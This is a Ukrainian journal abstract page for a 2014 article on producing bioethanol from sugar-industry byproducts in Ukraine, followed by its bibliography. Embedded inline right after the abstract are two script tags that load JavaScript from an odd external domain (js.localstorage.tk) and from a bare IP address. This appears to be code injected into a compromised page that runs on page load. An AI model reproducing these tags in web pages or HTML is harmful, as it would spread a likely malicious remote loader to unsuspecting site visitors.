ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 62-631.4(477)
Економіка агропромислового виробництва

Пріоритетні напрями виробництва біоетанолу в Україні / Скорук О. П., Зубар І.В. // Економіка АПК. - 2014. - № 2 - С. 36

Розглянуто сучасний стан цукрової галузі України, досліджено економічні показники її діяльності за останні роки. Визначено головні проблеми цукробурякового підкомплексу та шляхи їх розв’язання з метою підвищення прибутковості галузі. Розглянуто перспективи й економічні аспекти використання побічної продукції виробництва цукру як сировини для виробництва біопалива. Пропонується створення умов виробництва біоетанолу безпосередньо на цукрових заводах. Також зроблено акцент на можливості виробництва паливного етанолу на спиртових потужностях України, які через відсутність налагоджених ринків збуту функціонують лише на 30 % своїх можливих потужностей. Оцінено потенційні можливості та економічний результат від запровадження виробництва біоетанолу за рахунок частини сировинного потенціалу цукробурякового підкомплексу, а також можливе підвищення конкуренції на ринку біоетанолу й меляси. Оскільки використання меляси на цукрових заводах може створити передумови для скорочення виробничих потужностей спиртових підприємств, постає питання розширення ринків збуту та державного регулювання споживання біоетанолу в Україні. Табл.: 3. Рис.: 1. Бібліогр.: 14.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: біоетанол, цукробуряковий підкомплекс, цукрові буряки, відходи цукровиробництва, спиртова галузь, ефективність, рентабельність

Список використаних джерел

 1. Гевак З.В. Сучасний стан та перспективи розвитку спиртової промисловості / З.В. Гевак // Інноваційна економіка. – 2012. –№ 5. – С. 190-193.
 2. Державна програма активізації розвитку економіки на 2013-2014 роки від 27 лютого 2013 р. № 187. Урядовий портал [Електронний ресурс]. – Режим доступу: http://www.kmu.gov.ua/control/publish/article?art_id=246247059.
 3. Доронін А.В. Ефективність виробництва цукрових буряків та цукру в Україні/ А.В. Доронін // Сталий розвиток економіки. – 2013. –№ 3. – С. 51-55.
 4. Ємцев В. Сучасний стан та проблеми розвитку підприємств спиртової промисловості/ В. Ємцев // Продовольча індустрія АПК. – 2012. – № 2. – С. 4-7.
 5. Месель-Веселяк В.Я. Організаційно-економічне удосконалення роботи цукробурякового підкомплексу України / В.Я. Месель-Веселяк, М.М. Ярчук // Економіка АПК. – 2013.– № 2. – С. 3 – 8.
 6. Роїк М.В. Перспективи розвитку біоенергетики в Україні / М. В. Роїк, В.Л. Курило, М.Я. Гументик, О.М. Ганженко // Цукрові буряки. – 2012. – № 2-3.– С. 6 – 8.
 7. Ярчук М.М. Аналітична інформація про підсумки роботи Національної асоціації цукровиків України в 2012 р. / М.М. Ярчук // Цукровий бізнес в умовах національного та світового ринку: матер. наук.-техніч. конф. цукровиків України.– К. : Цукор України, 2013. – С. 79–100.
 8. Хомічак Л.М. Основні принципи комплексної технології переробки цукрових буряків на цукор та біопалива/ Л.М. Хомічак, С.Т. Олійнічук // Шляхи диверсифікації виробництва продукції на цукрових заводах України: матер. Міжнар. наук.-техніч. конф. цукровиків України, 2013. – С. 78-82.
 9. Шматкова Г.К. Сучасні тенденції у розвитку спиртової та цукрової промисловості України / Г.К. Шматкова, Н.Ю. Губенко / /Цукор України. – 2012. – № 11. – С. 37-38.
 10. Закон України “Про внесення змін до деяких законів України щодо виробництва та використання моторних палив з вмістом біокомпонентів” / Відом. Верхов. Ради (ВВР), 2013. – № 19-20. – Ст.177.
 11. Енергетична стратегія України до 2030 року [Електронний ресурс]. – Режим доступу: http://mpe.kmu.gov.ua/fuel/control/uk/doccatalog/list?currDir=50358.
 12. Андросов А.Л. Промышленные технологии переработки послеспиртовой барды/ А.Л. Андросов, И.А.Елизаров, А.А. Третьяков// Вестник ТГТУ. – 2010. – № 16. – С.954.
 13. Jan Lindstedt Bioethanol production at the European sugar industry/ BioAlcohol Fuel Foundation (BAFF), Sweden, 2009.
 14. Juliane von Bismarck EU ethanol firms seek investigation of U.S. subsidies// Reuters magazine, 2011.
Читати статтю: 14_02_36-41.pdf
Читати переклад статті: 1402skoruk_zubar.pdf